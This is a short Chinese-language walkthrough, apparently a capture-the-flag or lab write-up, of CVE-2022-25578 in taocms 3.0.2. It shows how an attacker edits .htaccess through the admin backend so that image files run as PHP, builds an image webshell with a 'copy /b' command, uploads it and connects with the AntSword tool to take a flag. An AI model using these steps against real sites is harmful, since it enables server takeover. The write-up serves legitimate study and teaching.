taocms 代码注入 (CVE-2022-25578)

名称:taocms 代码注入 (CVE-2022-25578)

描述:taoCMS是基于php+sqlite/mysql的国内最小(100Kb左右)的功能完善的CMS管理系统.体积小(仅180Kb)速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能。

taocms v3.0.2 允许攻击者通过任意编辑.htaccess 文件来执行代码注入。

步骤1

网站搭建

taocms 代码注入 (CVE-2022-25578)_第1张图片

点击{本站管理后台}

taocms 代码注入 (CVE-2022-25578)_第2张图片

步骤2

查看并修改{.htaccess}

taocms 代码注入 (CVE-2022-25578)_第3张图片

taocms 代码注入 (CVE-2022-25578)_第4张图片

注:

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

步骤3

生成一个图片马

copy 1.jpg/b+123.php/a shell.jpg

taocms 代码注入 (CVE-2022-25578)_第5张图片

步骤4

将图片马写入{.htaccess}进行覆盖


  SetHandler application/x-httpd-php

taocms 代码注入 (CVE-2022-25578)_第6张图片

步骤5

上传图片马

taocms 代码注入 (CVE-2022-25578)_第7张图片

步骤6

访问上传的图片马

taocms 代码注入 (CVE-2022-25578)_第8张图片

步骤7

使用蚁剑链接,得到flag

taocms 代码注入 (CVE-2022-25578)_第9张图片

你可能感兴趣的:(服务器)